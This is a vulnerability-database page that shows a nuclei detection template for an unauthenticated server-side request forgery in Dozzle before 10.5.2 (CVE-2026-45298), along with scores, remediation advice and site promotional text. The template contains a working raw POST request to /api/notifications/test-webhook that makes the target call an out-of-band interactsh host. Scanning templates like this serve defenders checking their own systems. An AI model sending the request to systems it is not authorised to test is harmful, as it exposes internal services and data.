Lucene search
K

Dozzle - Server Side Request Forgery

🗓️ 06 Jul 2026 03:02:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 12 Views

Dozzle SSRF via unauthenticated POST to /api/notifications/test-webhook allows remote URLs to send POSTs.

Related
Refs
Code
id: CVE-2026-45298

info:
  name: Dozzle - Server Side Request Forgery
  author: theamanrawat
  severity: high
  description: |
    Dozzle prior to 10.5.2 contains a server-side request forgery caused by unauthenticated access to POST /api/notifications/test-webhook forwarding attacker-controlled URLs, letting remote attackers send arbitrary HTTP POST requests and receive response data, exploit requires no authentication.
  impact: |
    Remote attackers can send arbitrary HTTP POST requests and retrieve response data, potentially exposing internal services or sensitive information.
  remediation: |
    Update to version 10.5.2 or later.
  reference:
    - https://github.com/amir20/dozzle/security/advisories/GHSA-3v9w-6365-9w54
    - https://nvd.nist.gov/vuln/detail/CVE-2026-45298
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 8.6
    cve-id: CVE-2026-45298
    epss-score: 0.01491
    epss-percentile: 0.71007
    cwe-id: CWE-918
  metadata:
    verified: true
    max-request: 1
  tags: cve,cve2026,ssrf,dozzle

http:
  - raw:
      - |
        POST /api/notifications/test-webhook HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"url":"http://{{interactsh-url}}","headers":{}}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - 'http'

      - type: word
        part: body
        words:
          - '"statusCode":200'

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100d188008aa98676e2b0d04f66964747cd57393e58095b166745ba2cc3b22f8a780220577f472b18192d02482293063023aaad1d395bf199c1f9f950b8dde2dc398702:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

09 Jun 2026 08:28Current
6.1Medium risk
Vulners AI Score6.1
CVSS 3.18.6
EPSS0.01491
SSVC
12